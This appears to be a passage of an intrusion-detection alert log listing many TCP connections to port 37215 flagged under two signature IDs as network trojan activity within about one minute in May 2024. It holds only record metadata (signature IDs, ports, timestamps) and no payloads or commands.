          SID:2829579
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530185
          SID:2829579
          Source Port:35656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743540
          SID:2835222
          Source Port:45844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987515
          SID:2835222
          Source Port:34104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215805
          SID:2835222
          Source Port:36990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126741
          SID:2835222
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152824
          SID:2835222
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907851
          SID:2829579
          Source Port:50168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481093
          SID:2829579
          Source Port:49704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197954
          SID:2829579
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271929
          SID:2835222
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401613
          SID:2829579
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238438
          SID:2835222
          Source Port:57774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987215
          SID:2829579
          Source Port:47390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511287
          SID:2835222
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970970
          SID:2835222
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081447
          SID:2829579
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145174
          SID:2829579
          Source Port:37660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732740
          SID:2829579
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190470
          SID:2829579
          Source Port:46636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859775
          SID:2835222
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751517
          SID:2829579
          Source Port:42414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760496
          SID:2835222
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863312
          SID:2829579
          Source Port:52078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960660
          SID:2835222
          Source Port:59252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195452
          SID:2835222
          Source Port:52642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774127
          SID:2829579
          Source Port:47182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752166
          SID:2829579
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062184
          SID:2835222
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291462
          SID:2829579
          Source Port:56024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178126
          SID:2835222
          Source Port:42750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993064
          SID:2829579
          Source Port:47564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.285232
          SID:2835222
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593284
          SID:2835222
          Source Port:53970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888063
          SID:2829579
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492828
          SID:2829579
          Source Port:59542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075397
          SID:2835222
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980438
          SID:2829579
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209118
          SID:2829579
          Source Port:37812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287457
          SID:2835222
          Source Port:38684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147430
          SID:2835222
          Source Port:34724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989411
          SID:2835222
          Source Port:60334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482012
          SID:2829579
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958521
          SID:2829579
          Source Port:47490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298833
          SID:2829579
          Source Port:46118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710968
          SID:2835222
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298860
          SID:2829579
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.929902
          SID:2835222
          Source Port:36792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651498
          SID:2829579
          Source Port:49600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946678
          SID:2835222
          Source Port:50918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240243
          SID:2835222
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171363
          SID:2829579
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681090
          SID:2835222
          Source Port:32822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271285
          SID:2829579
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709130
          SID:2835222
          Source Port:51034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323583
          SID:2829579
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819050
          SID:2829579
          Source Port:42144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291646
          SID:2829579
          Source Port:42406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474641
          SID:2829579
          Source Port:35486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535387
          SID:2835222
          Source Port:56600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943332
          SID:2835222
          Source Port:33568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480468
          SID:2835222
          Source Port:37260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405503
          SID:2835222
          Source Port:46996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352480
          SID:2835222
          Source Port:34124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528853
          SID:2829579
          Source Port:54088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704828
          SID:2835222
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195300
          SID:2829579
          Source Port:35204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328474
          SID:2835222
          Source Port:33322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953526
          SID:2829579
          Source Port:48608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087317
          SID:2829579
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195988
          SID:2835222
          Source Port:38624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878310
          SID:2835222
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536685
          SID:2835222
          Source Port:49288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271168
          SID:2835222
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157560
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336958
          SID:2829579
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290236
          SID:2829579
          Source Port:58370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497364
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483728
          SID:2829579
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268813
          SID:2835222
          Source Port:43640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305705
          SID:2829579
          Source Port:45660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267650
          SID:2829579
          Source Port:43642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974923
          SID:2829579
          Source Port:44726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224971
          SID:2829579
          Source Port:43060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793559
          SID:2829579
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778589
          SID:2829579
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176291
          SID:2835222
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985162
          SID:2829579
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119121
          SID:2835222
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.514204
          SID:2829579
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034026
          SID:2829579
          Source Port:44928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405230
          SID:2835222
          Source Port:47822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437800
          SID:2835222
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345860
          SID:2829579
          Source Port:54804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923098
          SID:2829579
          Source Port:53076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799169
          SID:2835222
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.238479
          SID:2829579
          Source Port:55504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659576
          SID:2835222
          Source Port:47626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292415
          SID:2829579
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324659
          SID:2835222
          Source Port:34584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328851
          SID:2835222
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.368937
          SID:2829579
          Source Port:34920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811786
          SID:2829579
          Source Port:45180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845145
          SID:2835222
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441427
          SID:2829579
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529162
          SID:2829579
          Source Port:44640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067113
          SID:2835222
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594304
          SID:2829579
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724667
          SID:2835222
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858395
          SID:2829579
          Source Port:58622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818886
          SID:2835222
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846415
          SID:2835222
          Source Port:54486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664480
          SID:2835222
          Source Port:57600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243312
          SID:2835222
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473493
          SID:2829579
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745620
          SID:2829579
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493014
          SID:2829579
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322022
          SID:2835222
          Source Port:42262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722378
          SID:2829579
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079499
          SID:2829579
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142819
          SID:2829579
          Source Port:53090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959068
          SID:2829579
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063255
          SID:2835222
          Source Port:55948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325718
          SID:2829579
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697067
          SID:2829579
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858735
          SID:2835222
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065336
          SID:2829579
          Source Port:60100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270813
          SID:2835222
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657137
          SID:2829579
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2835222
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591575
          SID:2829579
          Source Port:38048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267093
          SID:2835222
          Source Port:37666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188136
          SID:2835222
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064589
          SID:2835222
          Source Port:57446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.509579
          SID:2829579
          Source Port:46798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987494
          SID:2835222
          Source Port:58440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663056
          SID:2829579
          Source Port:40244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760117
          SID:2835222
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890997
          SID:2829579
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301127
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338439
          SID:2829579
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.625099
          SID:2829579
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295248
          SID:2835222
          Source Port:56118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299390
          SID:2835222
          Source Port:44162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268597
          SID:2829579
          Source Port:48358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046922
          SID:2829579
          Source Port:45700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436117
          SID:2835222
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797246
          SID:2835222
          Source Port:40820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992448
          SID:2829579
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.228264
          SID:2829579
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879158
          SID:2829579
          Source Port:54502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321941
          SID:2835222
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710277
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142579
          SID:2835222
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684323
          SID:2829579
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878887
          SID:2835222
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770705
          SID:2829579
          Source Port:35054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704040
          SID:2835222
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140219
          SID:2829579
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213990
          SID:2829579
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978837
          SID:2835222
          Source Port:41160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034501
          SID:2829579
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474743
          SID:2835222
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242658
          SID:2829579
          Source Port:51894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155605
          SID:2829579
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2835222
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203805
          SID:2835222
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143827
          SID:2829579
          Source Port:35786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266622
          SID:2829579
          Source Port:53350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230117
          SID:2835222
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536803
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167722
          SID:2835222
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970180
          SID:2835222
          Source Port:34660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269849
          SID:2829579
          Source Port:39962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535685
          SID:2829579
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867846
          SID:2835222
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472463
          SID:2835222
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549500
          SID:2829579
          Source Port:52254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811607
          SID:2835222
          Source Port:59378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841578
          SID:2829579
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984215
          SID:2835222
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908971
          SID:2829579
          Source Port:60732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806674
          SID:2835222
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223191
          SID:2835222
          Source Port:58948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565817
          SID:2829579
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732820
          SID:2829579
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868638
          SID:2829579
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115875
          SID:2829579
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781227
          SID:2835222
          Source Port:34324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878666
          SID:2829579
          Source Port:52152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989060
          SID:2829579
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214281
          SID:2829579
          Source Port:50950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537267
          SID:2829579
          Source Port:46832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953406
          SID:2829579
          Source Port:56336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892831
          SID:2835222
          Source Port:59376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341184
          SID:2835222
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482969
          SID:2829579
          Source Port:52658
          Destination Port:37215
